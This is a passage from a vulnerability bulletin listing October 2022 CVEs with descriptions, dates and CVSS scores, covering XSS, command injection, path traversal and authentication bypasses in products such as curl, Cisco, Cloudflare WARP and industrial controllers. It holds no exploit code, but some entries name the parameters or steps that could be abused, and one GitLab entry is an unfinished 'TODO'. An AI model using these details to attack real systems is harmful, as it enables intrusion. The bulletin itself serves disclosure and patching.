twistedmatrix — twisted Twisted is an event-based framework for internet applications. Starting with version 0.9.4, when the Host header does not match a configured host, `twisted.web.vhost.NameVirtualHost` returns a `NoResource` resource which renders the Host header unescaped into the 404 response, allowing HTML and script injection. In practice this should be very difficult to exploit, as being able to modify the Host header of a normal HTTP request implies that one is already in a privileged position. This issue was fixed in version 22.10.0rc1. There are no known workarounds. 2022-10-26 5.4 CVE-2022-39348
MISC
CONFIRM
MISC
weseek — growi Improper access control vulnerability in GROWI prior to v5.1.4 (v5 series) and versions prior to v4.5.25 (v4 series) allows a remote authenticated attacker to bypass access restriction and download the markdown data from the pages set to private by the other users. 2022-10-24 6.5 CVE-2022-41799
MISC
MISC
wp_humans.txt_project — wp_humans.txt The WP Humans.txt WordPress plugin through 1.0.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2022-10-25 4.8 CVE-2022-3392
CONFIRM
yordam — library_automation_system Yordam Library Information Document Automation product before version 19.02 has an unauthenticated reflected XSS vulnerability. 2022-10-27 6.1 CVE-2021-45476
CONFIRM


Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
getkirby — kirby Kirby is a flat-file CMS. In versions prior to 3.5.8.2, 3.6.6.2, 3.7.5.1, and 3.8.1, Kirby is subject to user enumeration due to Improper Restriction of Excessive Authentication Attempts. This vulnerability affects you only if you are using the `code` or `password-reset` auth method with the `auth.methods` option or if you have enabled the `debug` option in production. By using two or more IP addresses and multiple login attempts, valid user accounts will lock, but invalid accounts will not, leading to account enumeration. This issue has been patched in versions 3.5.8.2, 3.6.6.2, 3.7.5.1, and 3.8.1. If you cannot update immediately, you can work around the issue by setting the `auth.methods` option to `password`, which disables the code-based login and password reset forms. 2022-10-24 3.7 CVE-2022-39314
CONFIRM
linux — linux_kernel A vulnerability was found in Linux Kernel and classified as problematic. Affected by this issue is the function rlb_arp_xmit of the file drivers/net/bonding/bond_alb.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211928. 2022-10-21 3.3 CVE-2022-3624
N/A
N/A
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been declared as problematic. This vulnerability affects the function vsock_connect of the file net/vmw_vsock/af_vsock.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. VDB-211930 is the identifier assigned to this vulnerability. 2022-10-21 3.3 CVE-2022-3629
N/A
N/A
linux — linux_kernel A vulnerability classified as problematic has been found in Linux Kernel. Affected is the function j1939_session_destroy of the file net/can/j1939/transport.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211932. 2022-10-21 3.3 CVE-2022-3633
MISC
MISC
robustel — r1510_firmware A firmware update vulnerability exists in the sysupgrade functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network packet can lead to arbitrary firmware update. An attacker can send a sequence of requests to trigger this vulnerability. 2022-10-25 2.7 CVE-2022-34845
MISC


Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
alivecor — kardiamobile The physical IoT device of AliveCor’s KardiaMobile, a smartphone-based personal electrocardiogram (EKG), has no encryption for its data-over-sound protocols. Exploiting this vulnerability could allow an attacker to read patient EKG results or create a denial-of-service condition by emitting sounds at similar frequencies as the device, disrupting the smartphone microphone’s ability to accurately read the data. To carry out this attack, the attacker must be close (less than 5 feet) to pick up and emit sound waves. 2022-10-27 not yet calculated CVE-2022-41627
MISC

ansible — ansible A flaw was found in Ansible in the amazon.aws collection when using the tower_callback parameter from the amazon.aws.ec2_instance module. This flaw allows an attacker to take advantage of this issue as the module is handling the parameter insecurely, leading to the password leaking in the logs. 2022-10-28 not yet calculated CVE-2022-3697
MISC
apache — dolphinscheduler Users can read any files through the log server. Apache DolphinScheduler users should upgrade to version 2.0.6 or higher. 2022-10-28 not yet calculated CVE-2022-26884
MISC
MLIST
aruba — edgeconnect_enterprise_orchestrator Vulnerabilities in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an unauthenticated remote attacker to bypass authentication. Successful exploitation of these vulnerabilities could allow an attacker to gain administrative privileges leading to a complete compromise of the Aruba EdgeConnect Enterprise Orchestrator with versions 9.1.2.40051 and below, 9.0.7.40108 and below, 8.10.23.40009 and below, and any older branches of Orchestrator not specifically mentioned. 2022-10-28 not yet calculated CVE-2022-37913
MISC
aruba — edgeconnect_enterprise_orchestrator Vulnerabilities in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an unauthenticated remote attacker to bypass authentication. Successful exploitation of these vulnerabilities could allow an attacker to gain administrative privileges leading to a complete compromise of the Aruba EdgeConnect Enterprise Orchestrator with versions 9.1.2.40051 and below, 9.0.7.40108 and below, 8.10.23.40009 and below, and any older branches of Orchestrator not specifically mentioned. 2022-10-28 not yet calculated CVE-2022-37914
MISC
aruba — edgeconnect_enterprise_orchestrator A vulnerability in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an unauthenticated remote attacker to run arbitrary commands on the underlying host. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the underlying operating system, leading to a complete system compromise of Aruba EdgeConnect Enterprise Orchestration with versions in the 9.1.x branch only: any 9.1.x Orchestrator instantiated as a new machine with a release prior to 9.1.3.40197. Orchestrators upgraded to 9.1.x were not affected. 2022-10-28 not yet calculated CVE-2022-37915
MISC
bosch — videojet_multi_4000 An error in the URL handler of the VIDEOJET multi 4000 may lead to a reflected cross site scripting (XSS) in the web-based interface. An attacker with knowledge of the encoder address can send a crafted link to a user, which will execute JavaScript code in the context of the user. 2022-10-27 not yet calculated CVE-2022-40183
CONFIRM
bosch — videojet_multi_4000 Incomplete filtering of JavaScript code in different configuration fields of the web based interface of the VIDEOJET multi 4000 allows an attacker with administrative credentials to store JavaScript code which will be executed for all administrators accessing the same configuration option. 2022-10-27 not yet calculated CVE-2022-40184
CONFIRM

chatwoot — chatwoot Impact varies for each individual vulnerability in the application. For generation of accounts, it may be possible, depending on the amount of system resources available, to create a DoS event in the server. These accounts still need to be activated; however, it is possible to identify the output Status Code to separate accounts that are generated and waiting for email verification. For the sign in directories, it is possible to brute force login attempts to either login portal, which could lead to account compromise. 2022-10-28 not yet calculated CVE-2022-3741
CONFIRM
MISC
cisco — anyconnect A vulnerability in the Cisco AnyConnect VPN server of Cisco Meraki MX and Cisco Meraki Z3 Teleworker Gateway devices could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to insufficient validation of client-supplied parameters while establishing an SSL VPN session. An attacker could exploit this vulnerability by crafting a malicious request and sending it to the affected device. A successful exploit could allow the attacker to cause the Cisco AnyConnect VPN server to crash and restart, resulting in the failure of the established SSL VPN connections and forcing remote users to initiate a new VPN connection and re-authenticate. A sustained attack could prevent new SSL VPN connections from being established. Note: When the attack traffic stops, the Cisco AnyConnect VPN server recovers gracefully without requiring manual intervention. Cisco Meraki has released software updates that address this vulnerability. 2022-10-26 not yet calculated CVE-2022-20933
CISCO
cisco — identity_services_engine A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to read and delete files on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request that contains certain character sequences to an affected system. A successful exploit could allow the attacker to read or delete specific files on the device that their configured administrative level should not have access to. Cisco plans to release software updates that address this vulnerability. 2022-10-26 not yet calculated CVE-2022-20822
CISCO
cisco — telepresence_and_roomos Multiple vulnerabilities in Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an attacker to conduct path traversal attacks, view sensitive data, or write arbitrary files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. 2022-10-26 not yet calculated CVE-2022-20776
CISCO

cisco — telepresence_and_roomos Multiple vulnerabilities in Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an attacker to conduct path traversal attacks, view sensitive data, or write arbitrary files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. 2022-10-26 not yet calculated CVE-2022-20811
CISCO
cisco — telepresence_and_roomos Multiple vulnerabilities in Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an attacker to conduct path traversal attacks, view sensitive data, or write arbitrary files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. 2022-10-26 not yet calculated CVE-2022-20953
CISCO
cisco — telepresence_and_roomos Multiple vulnerabilities in Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an attacker to conduct path traversal attacks, view sensitive data, or write arbitrary files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. 2022-10-26 not yet calculated CVE-2022-20954
CISCO
cisco — telepresence_and_roomos Multiple vulnerabilities in Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an attacker to conduct path traversal attacks, view sensitive data, or write arbitrary files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. 2022-10-26 not yet calculated CVE-2022-20955
CISCO

cloudflare — octorpki Attackers can create long chains of CAs that would lead to OctoRPKI exceeding its max iterations parameter. In consequence it would cause the program to crash, preventing it from finishing the validation and leading to a denial of service. 2022-10-28 not yet calculated CVE-2022-3616
MISC

cloudflare — warp_client Using warp-cli command “add-trusted-ssid”, a user was able to disconnect WARP client and bypass the “Lock WARP switch” feature resulting in Zero Trust policies not being enforced on an affected endpoint. 2022-10-28 not yet calculated CVE-2022-3512
MISC
cloudflare — warp_mobile_client It was possible for a user to delete a VPN profile from WARP mobile client on iOS platform despite the Lock WARP switch feature (https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/warp/warp-settings/#lock-warp-switch) being enabled on Zero Trust Platform. This led to bypassing policies and restrictions enforced for enrolled devices by the Zero Trust platform. 2022-10-28 not yet calculated CVE-2022-3337
MISC
cloudflare — zero_trust_platform It was possible to bypass policies configured for Zero Trust Secure Web Gateway by using warp-cli ‘set-custom-endpoint’ subcommand. Using this command with an unreachable endpoint caused the WARP Client to disconnect and allowed bypassing administrative restrictions on a Zero Trust enrolled endpoint. 2022-10-28 not yet calculated CVE-2022-3320
MISC

cloudflare — zero_trust_platform It was possible to bypass the Lock WARP switch feature (https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/warp/warp-settings/#lock-warp-switch) on the WARP iOS mobile client by enabling both “Disable for cellular networks” and “Disable for Wi-Fi networks” switches at once in the application settings. Such configuration caused the WARP client to disconnect and allowed the user to bypass restrictions and policies enforced by the Zero Trust platform. 2022-10-28 not yet calculated CVE-2022-3321
MISC

cloudflare — zero_trust_platform Lock WARP switch is a feature of the Zero Trust platform which, when enabled, prevents users of enrolled devices from disabling the WARP client. Due to insufficient policy verification by the WARP iOS client, this feature could be bypassed by using the “Disable WARP” quick action. 2022-10-28 not yet calculated CVE-2022-3322
MISC
curl — curl curl before 7.86.0 has a double free. If curl is told to use an HTTP proxy for a transfer with a non-HTTP(S) URL, it sets up the connection to the remote server by issuing a CONNECT request to the proxy, and then tunnels the rest of the protocol through. An HTTP proxy might refuse this request (HTTP proxies often only allow outgoing connections to specific port numbers, like 443 for HTTPS) and instead return a non-200 status code to the client. Due to flaws in the error/cleanup handling, this could trigger a double free in curl if one of the following schemes were used in the URL for the transfer: dict, gopher, gophers, ldap, ldaps, rtmp, rtmps, or telnet. The earliest affected version is 7.77.0. 2022-10-29 not yet calculated CVE-2022-42915
MISC
FEDORA
curl — curl In curl before 7.86.0, the HSTS check could be bypassed to trick it into staying with HTTP. Using its HSTS support, curl can be instructed to use HTTPS directly (instead of using an insecure cleartext HTTP step) even when HTTP is provided in the URL. This mechanism could be bypassed if the host name in the given URL uses IDN characters that get replaced with ASCII counterparts as part of the IDN conversion, e.g., using the character UTF-8 U+3002 (IDEOGRAPHIC FULL STOP) instead of the common ASCII full stop of U+002E (.). The earliest affected version is 7.77.0 (2021-05-26). 2022-10-29 not yet calculated CVE-2022-42916
MISC
FEDORA
datahub — datahub DataHub is an open-source metadata platform. Prior to version 0.8.45, the `StatelessTokenService` of the DataHub metadata service (GMS) does not verify the signature of JWT tokens. This allows an attacker to connect to DataHub instances as any user if Metadata Service authentication is enabled. This vulnerability occurs because the `StatelessTokenService` of the Metadata service uses the `parse` method of `io.jsonwebtoken.JwtParser`, which does not perform a verification of the cryptographic token signature. This means that JWTs are accepted regardless of the used algorithm. This issue may lead to an authentication bypass. Version 0.8.45 contains a patch for the issue. There are no known workarounds. 2022-10-28 not yet calculated CVE-2022-39366
MISC
MISC
MISC
CONFIRM
MISC
dzzoffice — dzzoffice A Cross-Site Request Forgery (CSRF) in dzzoffice 2.02.1_SC_UTF8 allows attackers to arbitrarily create user accounts and grant Administrator rights to regular users. 2022-10-27 not yet calculated CVE-2022-43340
MISC
MISC
MISC

eaton — foreseer_epms A security vulnerability was discovered in the Eaton Foreseer EPMS software. Foreseer EPMS connects an operation’s vast array of devices to assist in the reduction of energy consumption and avoid unplanned downtime caused by the failures of critical systems. A threat actor may upload arbitrary files using the file upload feature. This vulnerability is present in versions 4.x, 5.x, 6.x & 7.0 to 7.5. A new version (v7.6) containing the remediation has been made available by Eaton and a mitigation has been provided for the affected versions that are currently supported. Customers are advised to update the software to the latest version (v7.6). Foreseer EPMS versions 4.x, 5.x, 6.x are no longer supported by Eaton. Please refer to the End-of-Support notification: https://www.eaton.com/in/en-us/catalog/services/foreseer/foreseer-legacy.html. 2022-10-28 not yet calculated CVE-2022-33859
MISC
esri — arcgis_server Esri ArcGIS Server versions 10.9.1 and prior have a path traversal vulnerability that may result in a denial of service by allowing a remote, authenticated attacker to overwrite internal ArcGIS Server directory. 2022-10-25 not yet calculated CVE-2022-38196
CONFIRM
esri — arcgis_server Esri ArcGIS Server versions 10.9.1 and below have an unvalidated redirect issue that may allow a remote, unauthenticated attacker to phish a user into accessing an attacker controlled website via a crafted query parameter. 2022-10-25 not yet calculated CVE-2022-38197
CONFIRM
esri — arcgis_server A cross site scripting vulnerability exists in some map service configurations of ArcGIS Server versions 10.8.1 and 10.7.1. Specifically crafted web requests can execute arbitrary JavaScript in the context of the victim’s browser. 2022-10-25 not yet calculated CVE-2022-38200
CONFIRM
exiv2 — exiv2 A vulnerability was found in Exiv2 and classified as problematic. This issue affects the function QuickTimeVideo::userDataDecoder of the file quicktimevideo.cpp of the component QuickTime Video Handler. The manipulation leads to null pointer dereference. The attack may be initiated remotely. The name of the patch is 6bb956ad808590ce2321b9ddf6772974da27c4ca. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-212495. 2022-10-29 not yet calculated CVE-2022-3755
MISC
MISC
MISC
exiv2 — exiv2 A vulnerability was found in Exiv2. It has been classified as critical. Affected is the function QuickTimeVideo::userDataDecoder of the file quicktimevideo.cpp of the component QuickTime Video Handler. The manipulation leads to integer overflow. It is possible to launch the attack remotely. The name of the patch is bf4f28b727bdedbd7c88179c30d360e54568a62e. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-212496. 2022-10-29 not yet calculated CVE-2022-3756
MISC
MISC
exiv2 — exiv2 A vulnerability was found in Exiv2. It has been declared as critical. Affected by this vulnerability is the function QuickTimeVideo::decodeBlock of the file quicktimevideo.cpp of the component QuickTime Video Handler. The manipulation leads to buffer overflow. The attack can be launched remotely. The name of the patch is d3651fdbd352cbaf259f89abf7557da343339378. It is recommended to apply a patch to fix this issue. The identifier VDB-212497 was assigned to this vulnerability. 2022-10-29 not yet calculated CVE-2022-3757
MISC
MISC
MISC
forgerock — access_management It may be possible to gain some details of the deployment through a well-crafted attack. This may allow that data to be used to probe internal network services. 2022-10-27 not yet calculated CVE-2022-24669
MISC
MISC
forgerock — access_management An attacker can use the unrestricted LDAP queries to determine configuration entries 2022-10-27 not yet calculated CVE-2022-24670
MISC
MISC
gitlab — gitlab An issue has been discovered in GitLab affecting all versions starting from 10.0 before 12.9.8, all versions starting from 12.10 before 12.10.7, all versions starting from 13.0 before 13.0.1. TODO 2022-10-28 not yet calculated CVE-2022-2826
CONFIRM
MISC
MISC
gl-inet — multiple_products gl-inet GL-MT300N-V2 Mango v3.212 and GL-AX1800 Flint v3.214 were discovered to contain multiple command injection vulnerabilities via the ping_addr and trace_addr function parameters. 2022-10-27 not yet calculated CVE-2022-31898
MISC
gl.inet_goodcloud_iot_device_management_system — gl.inet_goodcloud_iot_device_management_system Multiple stored cross-site scripting (XSS) vulnerabilities in GL.iNet GoodCloud IoT Device Management System Version 1.00.220412.00 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Company Name and Description text fields. 2022-10-27 not yet calculated CVE-2022-42054
MISC
gl.inet_goodcloud_iot_device_management_system — gl.inet_goodcloud_iot_device_management_system Multiple command injection vulnerabilities in GL.iNet GoodCloud IoT Device Management System Version 1.00.220412.00 via the ping and traceroute tools allow attackers to read arbitrary files on the system. 2022-10-27 not yet calculated CVE-2022-42055
MISC

google — multiple_products The implementation of backslash parsing in the Dart URI class for versions prior to 2.18 and Flutter versions prior to 3.30 differs from the WhatWG URL standards. Dart uses the RFC 3986 syntax, which creates incompatibilities with the `\` characters in URIs, which can lead to auth bypass in webapps interpreting URIs. We recommend updating Dart or Flutter to mitigate the issue. 2022-10-27 not yet calculated CVE-2022-3095
CONFIRM
haas — haas_cnc_controller Communication traffic involving “Ethernet Q Commands” service of Haas Controller version 100.20.000.1110 is transmitted in cleartext. This allows an attacker to obtain sensitive information being passed to and from the controller. 2022-10-28 not yet calculated CVE-2022-41636
MISC
haas_automation_inc — haas_controller Authentication is currently unsupported in Haas Controller version 100.20.000.1110 when using the “Ethernet Q Commands” service, which allows any user on the same network segment as the controller (even while connected remotely) to access the service and write unauthorized macros to the device. 2022-10-28 not yet calculated CVE-2022-2474
MISC
haas_automation_inc — haas_controller Haas Controller version 100.20.000.1110 has insufficient granularity of access control when using the “Ethernet Q Commands” service. Any user is able to write macros into registers outside of the authorized accessible range. This could allow a user to access privileged resources or resources out of context. 2022-10-28 not yet calculated CVE-2022-2475
MISC
heidenhain — controller_tnc_640 The HEIDENHAIN Controller TNC 640, version 340590 07 SP5, running HEROS 5.08.3 controlling the HARTFORD 5A-65E CNC machine is vulnerable to improper authentication, which may allow an attacker to deny service to the production line, steal sensitive data from the production line, and alter any products created by the production line. 2022-10-28 not yet calculated CVE-2022-41648
MISC

honeywell — experion_pks

Honeywell Experion PKS C200, C200E, C300, and ACE controllers are vulnerable to improper neutralization of special elements in output, which may allow an attacker to remotely execute arbitrary code and cause a denial-of-service condition. 2022-10-28 not yet calculated CVE-2021-38395
CONFIRM
CONFIRM

honeywell — experion_pks

Honeywell Experion PKS C200, C200E, C300, and ACE controllers are vulnerable to unrestricted file uploads, which may allow an attacker to remotely execute arbitrary code and cause a denial-of-service condition. 2022-10-28 not yet calculated CVE-2021-38397
CONFIRM
CONFIRM

honeywell — experion_pks

Honeywell Experion PKS C200, C200E, C300, and ACE controllers are vulnerable to relative path traversal, which may allow an attacker access to unauthorized files and directories. 2022-10-28 not yet calculated CVE-2021-38399
CONFIRM
CONFIRM

horner_automation — cscape

Horner Automation’s Cscape version 9.90 SP 7 and prior does not properly validate user-supplied data. If a user opens a maliciously formed FNT file, then an attacker could execute arbitrary code within the current process by accessing an uninitialized pointer, leading to an out-of-bounds memory write. 2022-10-27 not yet calculated CVE-2022-3378
MISC
horner_automation — cscape Horner Automation’s Cscape version 9.90 SP7 and prior does not properly validate user-supplied data. If a user opens a maliciously formed FNT file, then an attacker could execute arbitrary code within the current process by writing outside the memory buffer. 2022-10-27 not yet calculated CVE-2022-3379
MISC

host_engineering — h0-ecom100

Using custom code, an attacker can write into name or description fields larger than the appropriate buffer size causing a stack-based buffer overflow on Host Engineering H0-ECOM100 Communications Module Firmware versions v5.0.155 and prior. This may allow an attacker to crash the affected device or cause it to become unresponsive. 2022-10-28 not yet calculated CVE-2022-3228
MISC

iku-soft — rdiffweb

Business Logic Errors in GitHub repository ikus060/rdiffweb prior to 2.5.0a7. 2022-10-26 not yet calculated CVE-2022-3363
CONFIRM
MISC
ip-com_ew9 — ip-com_ew9 An access control issue in the password reset page of IP-COM EW9 V15.11.0.14(9732) allows unauthenticated attackers to arbitrarily change the admin password. 2022-10-27 not yet calculated CVE-2022-43364
MISC
ip-com_ew9 — ip-com_ew9 IP-COM EW9 V15.11.0.14(9732) was discovered to contain a buffer overflow in the formSetDebugCfg function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string. 2022-10-27 not yet calculated CVE-2022-43365
MISC
ip-com_ew9 — ip-com_ew9 IP-COM EW9 V15.11.0.14(9732) allows unauthenticated attackers to access sensitive information via the checkLoginUser, ate, telnet, version, setDebugCfg, and boot interfaces. 2022-10-27 not yet calculated CVE-2022-43366
MISC
ip-com_ew9 — ip-com_ew9 IP-COM EW9 V15.11.0.14(9732) was discovered to contain a command injection vulnerability in the formSetDebugCfg function. 2022-10-27 not yet calculated CVE-2022-43367
MISC
johnson_controls — cevas All versions of CEVAS prior to 1.01.46 do not sufficiently validate user-controllable input and could allow a user to bypass authentication and retrieve data with specially crafted SQL queries. 2022-10-28 not yet calculated CVE-2021-36206
CERT
CONFIRM
mitel — micollab A vulnerability in the web conferencing component of Mitel MiCollab through 9.5.0.101 could allow an unauthenticated attacker to upload malicious files. A successful exploit could allow an attacker to execute arbitrary code within the context of the application. 2022-10-25 not yet calculated CVE-2022-36452
MISC
MISC
multipath-tools — multipath-tools multipath-tools 0.7.7 through 0.9.x before 0.9.2 allows local users to obtain root access, as exploited in conjunction with CVE-2022-41974. Local users able to access /dev/shm can change symlinks in multipathd due to incorrect symlink handling, which could lead to controlled file writes outside of the /dev/shm directory. This could be used indirectly for local privilege escalation to root. 2022-10-29 not yet calculated CVE-2022-41973
MISC
MISC
MISC
FULLDISC
multipath-tools — multipath-tools multipath-tools 0.7.0 through 0.9.x before 0.9.2 allows local users to obtain root access, as exploited alone or in conjunction with CVE-2022-41973. Local users able to write to UNIX domain sockets can bypass access controls and manipulate the multipath setup. This can lead to local privilege escalation to root. This occurs because an attacker can repeat a keyword, which is mishandled because arithmetic ADD is used instead of bitwise OR. 2022-10-29 not yet calculated CVE-2022-41974
MISC
MISC
MISC
FULLDISC
multiple_products — multiple_products In Tenda ax1803 v1.0.0.1, the http requests handled by the fromAdvSetMacMtuWan functions, wanSpeed, cloneType, mac, can cause a stack overflow and enable remote code execution (RCE). 2022-10-27 not yet calculated CVE-2022-40876
MISC
MISC
nextcloud — server Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform. Nextcloud Server and Nextcloud Enterprise Server prior to versions 23.0.9 and 24.0.5 are vulnerable to exposure of information that cannot be controlled by administrators without direct database access. Versions 23.0.9 and 24.0.5 contain patches for this issue. No known workarounds are available. 2022-10-27 not yet calculated CVE-2022-39329
MISC
CONFIRM
MISC
nextcloud — server Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform. Nextcloud Server prior to versions 23.0.10 and 24.0.6 and Nextcloud Enterprise Server prior to versions 22.2.10, 23.0.10, and 24.0.6 are vulnerable to a logged-in attacker slowing down the system by generating a lot of database/cpu load. Nextcloud Server versions 23.0.10 and 24.0.6 and Nextcloud Enterprise Server versions 22.2.10, 23.0.10, and 24.0.6 contain patches for this issue. As a workaround, disable the Circles app. 2022-10-27 not yet calculated CVE-2022-39330
MISC
CONFIRM
MISC
nextcloud — server Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform. In Nextcloud Server prior to versions 23.0.9 and 24.0.5 and Nextcloud Enterprise Server prior to versions 22.2.10.5, 23.0.9, and 24.0.5 an attacker reading `nextcloud.log` may gain knowledge of credentials to connect to a SharePoint service. Nextcloud Server versions 23.0.9 and 24.0.5 and Nextcloud Enterprise Server versions 22.2.10.5, 23.0.9, and 24.0.5 contain a patch for this issue. As a workaround, set `zend.exception_ignore_args = On` as an option in `php.ini`. 2022-10-27 not yet calculated CVE-2022-39364
MISC
CONFIRM
MISC
MISC
nginx_njs — nginx_njs Nginx NJS v0.7.2 to v0.7.4 was discovered to contain a segmentation violation via njs_scope_valid_value at njs_scope.h. 2022-10-28 not yet calculated CVE-2022-43284
MISC
MISC
nginx_njs — nginx_njs Nginx NJS v0.7.4 was discovered to contain a segmentation violation in njs_promise_reaction_job. 2022-10-28 not yet calculated CVE-2022-43285
MISC
nginx_njs — nginx_njs Nginx NJS v0.7.2 was discovered to contain a heap-use-after-free bug caused by illegal memory copy in the function njs_json_parse_iterator_call at njs_json.c. 2022-10-28 not yet calculated CVE-2022-43286
MISC
MISC
openbmc — bmcweb A vulnerability in bmcweb of OpenBMC Project allows a user to cause a denial of service. Fuzzing the multipart_parser code using AFL++ with address sanitizer enabled, to find the smallest memory corruptions possible, detected a problem in how multipart_parser handles unclosed HTTP headers. If a long enough HTTP header is passed in the multipart form without a colon, there is a one-byte overwrite on the heap. It can be conducted multiple times in a loop to cause DoS. 2022-10-27 not yet calculated CVE-2022-2809
CONFIRM

openbmc — openbmc A vulnerability in bmcweb of OpenBMC Project allows a user to cause a denial of service. This vulnerability was identified during mitigation for CVE-2022-2809. Fuzzing the multipart_parser code using AFL++ with address sanitizer enabled, to find the smallest memory corruptions possible, detected a problem in how multipart_parser handles unclosed HTTP headers. If a long enough HTTP header is passed in the multipart form without a colon, there is a one-byte overwrite on the heap. It can be conducted multiple times in a loop to cause DoS. 2022-10-27 not yet calculated CVE-2022-3409
CONFIRM

opennebula — opennebula

Files or Directories Accessible to External Parties vulnerability in OpenNebula on Linux allows File Discovery. 2022-10-28 not yet calculated CVE-2022-37424
MISC

opennebula — opennebula

Improper Neutralization of Special Elements used in a Command (‘Command Injection’) vulnerability in OpenNebula OpenNebula core on Linux allows Remote Code Inclusion. 2022-10-28 not yet calculated CVE-2022-37425
MISC

opennebula — opennebula

Unrestricted Upload of File with Dangerous Type vulnerability in OpenNebula OpenNebula core on Linux allows File Content Injection. 2022-10-28 not yet calculated CVE-2022-37426
MISC
packet_storm — hashicorp_boundary Hashicorp Boundary v0.8.0 is vulnerable to Clickjacking, which allows for the interception of login credentials, re-direction of users to malicious sites, or causing users to perform malicious actions on the site. 2022-10-27 not yet calculated CVE-2022-36182
MISC
MISC

phpmyfaq — phpmyfaq

Weak Password Requirements in GitHub repository thorsten/phpmyfaq prior to 3.1.8. 2022-10-29 not yet calculated CVE-2022-3754
MISC
CONFIRM

pimcore — pimcore

Pimcore is an open source data and experience management platform. Prior to version 10.5.9, the user controlled twig templates rendering in `Pimcore/Mail` & `ClassDefinitionLayoutText` is vulnerable to server-side template injection, which could lead to remote code execution. Version 10.5.9 contains a patch for this issue. As a workaround, one may apply the patch manually. 2022-10-27 not yet calculated CVE-2022-39365
MISC
MISC
MISC
CONFIRM
qtiworks — qtiworks QTIWorks is a software suite for standards-based assessment delivery. Prior to version 1.0-beta15, the QTIWorks Engine allows users to upload QTI content packages as ZIP files. The ZIP handling code does not sufficiently check the paths of files contained within ZIP files, so can insert files into other locations in the filesystem if they are writable by the process running the QTIWorks Engine. In extreme cases, this could allow anonymous users to change files in arbitrary locations in the filesystem. In normal QTIWorks Engine deployments, the impact is somewhat reduced because the default QTIWorks configuration does not enable the public demo functionality, so ZIP files can only be uploaded by users with “instructor” privileges. This vulnerability is fixed in version 1.0-beta15. There are no database configuration changes required when upgrading to this version. No known workarounds for this issue exist. 2022-10-28 not yet calculated CVE-2022-39367
MISC
MISC
CONFIRM
redis — redis A vulnerability was found in Redis. It has been declared as critical. This vulnerability affects unknown code in the library C:/Program Files/Redis/dbghelp.dll. The manipulation leads to uncontrolled search path. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-212416. 2022-10-28 not yet calculated CVE-2022-3734
N/A
N/A
resolveshims — resolveshims Prototype pollution vulnerability in function resolveShims in resolve-shims.js in thlorenz browserify-shim 3.8.15 via the fullPath variable in resolve-shims.js. 2022-10-28 not yet calculated CVE-2022-37621
MISC
MISC
MISC

rockwell_automation — factorytalk_alarm_and_events

An unauthenticated attacker with network access to a victim’s Rockwell Automation FactoryTalk Alarm and Events service could open a connection, causing the service to fault and become unavailable. The affected port could be used as a server ping port and uses messages structured with XML. 2022-10-27 not yet calculated CVE-2022-38744
MISC
rukovoditel — rukovoditel A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking “Add”. 2022-10-28 not yet calculated CVE-2022-43167
MISC
rukovoditel — rukovoditel Rukovoditel v3.2.1 was discovered to contain a SQL injection vulnerability via the reports_id parameter. 2022-10-28 not yet calculated CVE-2022-43168
MISC
rukovoditel — rukovoditel A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking “Add New Group”. 2022-10-28 not yet calculated CVE-2022-43169
MISC
rukovoditel — rukovoditel A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking “Add info block”. 2022-10-28 not yet calculated CVE-2022-43170
MISC
seccome — ehoney A vulnerability, which was classified as critical, has been found in seccome Ehoney. This issue affects some unknown processing of the file /api/v1/attack. The manipulation of the argument AttackIP leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-212411. 2022-10-28 not yet calculated CVE-2022-3729
N/A
